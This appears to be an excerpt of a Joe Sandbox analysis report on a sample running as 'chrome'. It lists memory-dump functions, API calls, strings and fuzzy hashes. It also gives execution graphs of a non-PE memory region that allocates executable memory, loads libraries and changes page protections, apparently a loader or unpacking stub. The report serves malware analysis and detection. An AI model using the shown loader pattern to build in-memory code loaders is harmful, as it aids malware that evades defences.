                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: ..\..\third_party\libc++\src\include\array:239: assertion __n < _Size failed: out-of-bounds access in std::array<T, N>
                                                    • API String ID: 17069307-1005156258
                                                    • Opcode ID: c1fb519a1cf126b6365fffa9acebcccc4cabb5e5a05e4382b386ec22256c929d
                                                    • Instruction ID: 29b24242e83a940b0dd287e6ee62a46df132e1ea582c46049df53eb1ac9af914
                                                    • Opcode Fuzzy Hash: c1fb519a1cf126b6365fffa9acebcccc4cabb5e5a05e4382b386ec22256c929d
                                                    • Instruction Fuzzy Hash: 6E31A230A0018ADFDB10CF24C894AEABBF5FF49318F188555F454AB341D73AE956CBA0
                                                    APIs
                                                    • WriteFile.KERNEL32(00000024,?,7FFFFFFF,?,00000000), ref: 00D7483D
                                                    Strings
                                                    • ..\..\third_party\crashpad\crashpad\util\file\file_io.cc, xrefs: 00D748B2
                                                    • WriteFile, xrefs: 00D748C4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\file\file_io.cc$WriteFile
                                                    • API String ID: 3934441357-1292784012
                                                    • Opcode ID: 18ec4dc449cb8f1e12480a082ba9beadbff72ff58a73229ceec3797e385bc0d4
                                                    • Instruction ID: 82ce3cf4db6f855ef2c527cc9712f326aeb9a0ce6761016270e42396e386a9d4
                                                    • Opcode Fuzzy Hash: 18ec4dc449cb8f1e12480a082ba9beadbff72ff58a73229ceec3797e385bc0d4
                                                    • Instruction Fuzzy Hash: 5421DA317003589BDB289A299C55B7B77AAABC4760F148369F92DB72C0DF30DD05C562
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 00D78770
                                                    • SetFilePointerEx, xrefs: 00D78780
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc$SetFilePointerEx
                                                    • API String ID: 973152223-3423003897
                                                    • Opcode ID: 0d4e88912ce1f554ac080d2c72d8c4fb727916dea3e63d14dcdcfdbe040b3d36
                                                    • Instruction ID: 57c41fa2a191ee8a3460833d81b7062da8c6daf06e6609b6ac63b74c21f62bfb
                                                    • Opcode Fuzzy Hash: 0d4e88912ce1f554ac080d2c72d8c4fb727916dea3e63d14dcdcfdbe040b3d36
                                                    • Instruction Fuzzy Hash: A121FF756043949FC724DF29980675BB7E9EFC9720F14C92EE88DA7381EB709804CB92
                                                    APIs
                                                    Strings
                                                    • bad_array_new_length was thrown in -fno-exceptions mode, xrefs: 00E57A73
                                                    • length_error was thrown in -fno-exceptions mode with message "%s", xrefs: 00E57A66
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: bad_array_new_length was thrown in -fno-exceptions mode$length_error was thrown in -fno-exceptions mode with message "%s"
                                                    • API String ID: 4218353326-980162239
                                                    • Opcode ID: d9870fc2459a3b5e3de15fc549c63d9af4a9e5504724e55cca196641a6232219
                                                    • Instruction ID: cb50ad933255ac165d6c41c08d92b5b9b89cb131410895bb57668916e8359e39
                                                    • Opcode Fuzzy Hash: d9870fc2459a3b5e3de15fc549c63d9af4a9e5504724e55cca196641a6232219
                                                    • Instruction Fuzzy Hash: 7401C4E5D0430C37DA2076B17C06F9B3B9D9B41724F402924FE5936683EA71A95881F2
                                                    APIs
                                                    • UnlockFileEx.KERNEL32(?,00000000,-00000001,-00000001,00000002), ref: 00D755D0
                                                    Strings
                                                    • ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 00D75616
                                                    • UnlockFileEx, xrefs: 00D75628
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: FileUnlock
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc$UnlockFileEx
                                                    • API String ID: 45017762-3540829929
                                                    • Opcode ID: 6d6c7b64d948a055bc798d746128f703c71e873d9be7276f9a34bccf618bc0dd
                                                    • Instruction ID: 0cd67b5c0c3bfdae793d34a8d48dad4931134be4fbbe4ea913330fed2f8a5e0d
                                                    • Opcode Fuzzy Hash: 6d6c7b64d948a055bc798d746128f703c71e873d9be7276f9a34bccf618bc0dd
                                                    • Instruction Fuzzy Hash: C7010871A003195BD7289F659C46EBF77AEEF84350F44816AF8097B2C1EB705D88C6A1
                                                    APIs
                                                      • Part of subcall function 00D42A10: UnmapViewOfFile.KERNEL32(?,00000000,?,?,00000001,?,00D325CE,?,?,?,?,?,?,?,?,00D324EF), ref: 00D42A22
                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,00000000,?,00D4294A,?,?), ref: 00D429CD
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D429D9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressFileHandleModuleProcUnmapView
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 3224599007-1090674830
                                                    • Opcode ID: 809b134b8d37f4d81cfa4500a20c552b5998b77397eb55c5e0d4091c35023b47
                                                    • Instruction ID: e941a8ab56a1d1e82018af37dbe4ffe474d7d05c5abd506b228dd2a8b73fe11b
                                                    • Opcode Fuzzy Hash: 809b134b8d37f4d81cfa4500a20c552b5998b77397eb55c5e0d4091c35023b47
                                                    • Instruction Fuzzy Hash: 3901D6712403409FDB206B26EC89B7B77E9FB49710F580825F543EB3A1DA70E804CAB1
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00D3D34F
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D3D35B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 1646373207-1090674830
                                                    • Opcode ID: 92f0f291b706efccd55c7540618a692435e74bb68b537563b457f9d0e864f39b
                                                    • Instruction ID: a9006453584e1b1289e49375b38ab4825b377a99a6c5c3230639ac4489cad9fe
                                                    • Opcode Fuzzy Hash: 92f0f291b706efccd55c7540618a692435e74bb68b537563b457f9d0e864f39b
                                                    • Instruction Fuzzy Hash: 3D0175B1600345EFD7106B66FC49B3A77AAFB89311F580425F142E73A1DA75AC48CA72
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 0-1090674830
                                                    • Opcode ID: 97acb8e96ab0c3297c796867db6c92cb56f714f2ef8963c5b629064befe5442b
                                                    • Instruction ID: 42835abe6ce047df57e3d9968828740e80bee6044e9fe189341500e300625afb
                                                    • Opcode Fuzzy Hash: 97acb8e96ab0c3297c796867db6c92cb56f714f2ef8963c5b629064befe5442b
                                                    • Instruction Fuzzy Hash: 7501D8B1600340AFDB106B26EC49BAA77A9FF85315F544429F106FB3B1EA71AC88C761
                                                    APIs
                                                      • Part of subcall function 00D786B0: SetFilePointerEx.KERNEL32 ref: 00D78724
                                                    • SetEndOfFile.KERNEL32(?), ref: 00D75E1B
                                                    Strings
                                                    • SetEndOfFile, xrefs: 00D75E6D
                                                    • ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 00D75E5B
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: File$Pointer
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc$SetEndOfFile
                                                    • API String ID: 1339342385-359779137
                                                    • Opcode ID: e9c64d58914dd472fe63f5dd524510adf5c007a0c3b9ef75216249ce581befb9
                                                    • Instruction ID: 50b76aaa1fad43da00cf1cf4bb5e039cd985810c8ab7e632195cdebcca5676de
                                                    • Opcode Fuzzy Hash: e9c64d58914dd472fe63f5dd524510adf5c007a0c3b9ef75216249ce581befb9
                                                    • Instruction Fuzzy Hash: EA01D875B007186EEB20AA656D47E7B779CDF45344F048075F90C77282FAB45E088672
                                                    APIs
                                                    • VirtualQuery.KERNEL32(80000000,00E29356,0000001C,00E2930B,00000000,?,?,?,?,?,?,?,00E29356,00000004,00EF2840,00E293A2), ref: 00E2925D
                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00E29356,00000004,00EF2840,00E293A2), ref: 00E29278
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: InfoQuerySystemVirtual
                                                    • String ID: D
                                                    • API String ID: 401686933-2746444292
                                                    • Opcode ID: e7a4d799c2d4ebbb9bd9e52b934743a503e7e1cd42d6edaa5970b71391b6ccb7
                                                    • Instruction ID: 2bf14f25bad367c9004b279af41980621baf5793fd1a8e3a30cab6c35faeb80c
                                                    • Opcode Fuzzy Hash: e7a4d799c2d4ebbb9bd9e52b934743a503e7e1cd42d6edaa5970b71391b6ccb7
                                                    • Instruction Fuzzy Hash: 51018473600119ABDF14DE29EC05BEE7BAEAFC4328F0CD124ED59EB255D634E9058690
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000000,00000000,?,00D3297D,?), ref: 00E10940
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00E1094C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 1646373207-1090674830
                                                    • Opcode ID: 1ee187ec4abc85166856a8c53ec5bbf48743ccc0393ea5b6cce600366f69ee97
                                                    • Instruction ID: 4aeea1b7eac01c9e2275b3a82c4ef2c471546f40b340d2b9245d802ca225fa6b
                                                    • Opcode Fuzzy Hash: 1ee187ec4abc85166856a8c53ec5bbf48743ccc0393ea5b6cce600366f69ee97
                                                    • Instruction Fuzzy Hash: 12F0C831340344AFE6102B66EC5DBBA379DE7C8705F040024F206FB3A2DAA46CC8CA71
                                                    APIs
                                                      • Part of subcall function 00E54170: _strlen.LIBCMT ref: 00E5426C
                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00E58480
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ___std_exception_destroy_strlen
                                                    • String ID: Bad variant access$bad_variant_access.cc
                                                    • API String ID: 907491995-4004146108
                                                    • Opcode ID: fa3ef2892bc4d796a97bb0e6898e4d0905f9c0157f0d7350d640e2c6beda2498
                                                    • Instruction ID: 38b5b3110037dfb4672ea9e7ffc1fd7a181a8a90fd88d1f1774de6f7207e3f47
                                                    • Opcode Fuzzy Hash: fa3ef2892bc4d796a97bb0e6898e4d0905f9c0157f0d7350d640e2c6beda2498
                                                    • Instruction Fuzzy Hash: 51E0D8F294131873E6117999BC07E977A8CCB21705F045836FF087A382E6E3AA5582E6
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00D848FE
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D8490A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 1646373207-1090674830
                                                    • Opcode ID: 0066f259109dd57b8db74156e9e14b0259d115f62220eac788f96f09b4c63a89
                                                    • Instruction ID: 031dc80a3100015c7458918424adbe2fa6d317e5f16fc3893e6bb6d88ba8180c
                                                    • Opcode Fuzzy Hash: 0066f259109dd57b8db74156e9e14b0259d115f62220eac788f96f09b4c63a89
                                                    • Instruction Fuzzy Hash: D8D01770604306BFDE107B72AE59B27379C9755B01F081428F106E6260DA68E808CA72

                                                    Execution Graph

                                                    Execution Coverage:41.7%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:6
                                                    Total number of Limit Nodes:0
                                                    execution_graph 86 4ff0000 VirtualAlloc 87 4ff003e 86->87 88 4ff00d4 LoadLibraryA 87->88 90 4ff014a 87->90 88->87 89 4ff01fe KiUserExceptionDispatcher 90->89 91 4ff01e7 VirtualProtect 90->91 91->89 91->90

                                                    Callgraph

                                                    Control-flow Graph

                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 04FF0035
                                                    • LoadLibraryA.KERNELBASE(00000000), ref: 04FF00E0
                                                    • VirtualProtect.KERNELBASE(?,?,00000000,?), ref: 04FF01F5
                                                    • KiUserExceptionDispatcher.NTDLL(00000000,00000001,00000000), ref: 04FF0215
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1775476039.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4ff0000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Virtual$AllocDispatcherExceptionLibraryLoadProtectUser
                                                    • String ID:
                                                    • API String ID: 375261010-0
                                                    • Opcode ID: b8864bbacc53f44fafcf5868b61b0984c31f2c7b71e3c944b9c1300256ee10cc
                                                    • Instruction ID: de1865b19889e4c34f3901d772de5420566288a5fdeff7b2775c1956b6ec4773
                                                    • Opcode Fuzzy Hash: b8864bbacc53f44fafcf5868b61b0984c31f2c7b71e3c944b9c1300256ee10cc
                                                    • Instruction Fuzzy Hash: 5681D375A0060AAFDB40CF9CC984A9EB7F5FF48314B1582A1E948EB362D730ED51CB94

                                                    Execution Graph

                                                    Execution Coverage:41.7%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:6
                                                    Total number of Limit Nodes:0
                                                    execution_graph 86 d20000 VirtualAlloc 88 d2003e 86->88 87 d200d4 LoadLibraryA 87->88 88->87 90 d2014a 88->90 89 d201fe KiUserExceptionDispatcher 90->89 91 d201e7 VirtualProtect 90->91 91->89 91->90

                                                    Callgraph

                                                    Control-flow Graph

                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00D20035
                                                    • LoadLibraryA.KERNELBASE(00000000), ref: 00D200E0
                                                    • VirtualProtect.KERNELBASE(?,?,00000000,?), ref: 00D201F5
                                                    • KiUserExceptionDispatcher.NTDLL(00000000,00000001,00000000), ref: 00D20215
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1787170547.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_d20000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Virtual$AllocDispatcherExceptionLibraryLoadProtectUser
                                                    • String ID:
                                                    • API String ID: 375261010-0
                                                    • Opcode ID: b8864bbacc53f44fafcf5868b61b0984c31f2c7b71e3c944b9c1300256ee10cc
                                                    • Instruction ID: 7b77381182cfbea2872da5ce0247595fb093257631fcabbedd6377e33cdd7f6c
                                                    • Opcode Fuzzy Hash: b8864bbacc53f44fafcf5868b61b0984c31f2c7b71e3c944b9c1300256ee10cc
